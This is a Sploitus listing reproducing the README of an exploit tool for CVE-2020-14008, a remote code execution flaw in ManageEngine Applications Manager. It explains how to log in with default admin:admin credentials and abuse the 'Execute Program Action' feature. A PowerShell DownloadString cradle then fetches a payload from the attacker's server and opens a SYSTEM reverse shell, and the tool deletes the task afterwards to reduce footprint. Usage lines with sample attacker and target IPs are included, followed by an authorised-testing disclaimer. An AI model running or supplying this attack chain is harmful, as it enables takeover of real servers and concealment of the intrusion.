Skip to content
Exploit for Unrestricted Upload of File with Dangerous Type in Zohocorp Manageengine_Applications_Manager

Exploit for Unrestricted Upload of File with Dangerous Type in Zohocorp Manageengine_Applications_Manager

Sploitus • September 27, 2026

An improved, more reliable exploit for **CVE-2020-14008** (Remote Code Execution in

ManageEngine Applications Manager, affected versions up to **14720**).

This tool chains an authenticated command-execution primitive

(`createExecProgAction`) with the well-known admin access to the Applications

Manager console, and executes a PowerShell payload fetched from the attacker's

HTTP server — bypassing the fragile JAR/classloader chain used by the original

The original PoC (Exploit-DB 48793) relies on a fragile chain:

1. Upload a malicious `weblogic.jar` via `Upload.do` (directory traversal)

2. Create and execute a task to `move` the JAR into `classes\weblogic\version8\`

3. Trigger a Weblogic credential test that loads the planted Java class

(`weblogic.jndi.Environment` → `setProviderUrl()` → reverse shell)

In practice, step 1 often **fails silently** on real targets: the upload

response never confirms success, the move task then "executes successfully"

without the file existing, the credential test loads the *legitimate* Weblogic

class instead, and no shell ever arrives — with no error at any step.

This tool skips that entire chain. It uses the same `createExecProgAction`

primitive directly to run an arbitrary command as the Applications Manager

service account (typically `NT AUTHORITY\SYSTEM`), delivering the payload via

`IEX(New-Object Net.WebClient).DownloadString(...)`.

- Parameterized: target IP, callback IP, and ports are all command-line arguments

- Auto-generates `shell.ps1` matching the chosen callback host/port

- Cleans up the created task after execution (including on timeouts)

- Interactive PowerShell reverse shell as `SYSTEM`

- Admin credentials for Applications Manager (see [Default Credentials](#default-credentials);

ManageEngine Applications Manager deployments frequently ship with (or are

left with) these default credentials — the exploit requires a working admin

> The script currently authenticates as `admin:admin`. If your target uses a

> different credential pair from the table above, edit the call to

> `get_valid_cookie()` in `main()` inside `am_rce_cmd.py`.

- An HTTP server to serve the generated payload, e.g.

python3 am_rce_cmd.py [am_port] [http_port]

| `target_ip` | Applications Manager host | — |

| `my_ip` | Your (attacker) IP reachable by the target | — |

| `rev_port` | Port for the reverse shell callback | — |

| `am_port` | Applications Manager HTTPS port | `8443` |

| `http_port` | Port of your HTTP server hosting `shell.ps1` | `8000` |

# Terminal 2 — payload HTTP server (run from the repo directory that

python3 am_rce_cmd.py 192.168.113.95 192.168.45.224 1337

1. Retrieve initial session cookies and obtain a valid admin session

2. Discover the Applications Manager base installation directory

3. Generate `shell.ps1` with the chosen callback host/port

4. Create an "Execute Program Action" task whose command is a short

`powershell ... DownloadString('

5. Execute the task — the target fetches the payload and connects back

6. Delete the created task to reduce footprint

| `am_rce_cmd.py` | This tool — direct command-execution exploit (this repo) |

| `cve-2020-14008.py` | Original PoC by Hodorsec (Exploit-DB 48793), kept for reference |

- Original PoC: [Hodorsec]( —

[Exploit-DB 48793](

This tool reuses helper functions from the original script and would not

- **Exploit-DB 48793** — Hodorsec, "ManageEngine Applications Manager 14700 -

Remote Code Execution (Authenticated)", published 2020-09-07:

- **Vendor** — ManageEngine Applications Manager:

- **Public PoC mirrors on GitHub** (independent repositories hosting the

This tool is provided for **educational purposes and authorized security

testing only**. It is intended for use in lab environments, capture-the-flag

exercises, and engagements where you have **explicit, prior written

- Do **not** use this tool on systems you do not own or do not have explicit

- Unauthorized access to computer systems is **illegal** under applicable law

(including, but not limited to, the U.S. Computer Fraud and Abuse Act,

the U.K. Computer Misuse Act, and Indonesia's UU ITE).

- The author assumes **no liability** and is **not responsible** for any

misuse, damage, or legal consequences caused by this tool.

- By using this tool, you accept full responsibility for your own actions and

agree to use it only in a lawful and ethical manner.

Extracted Entities

Domains (1)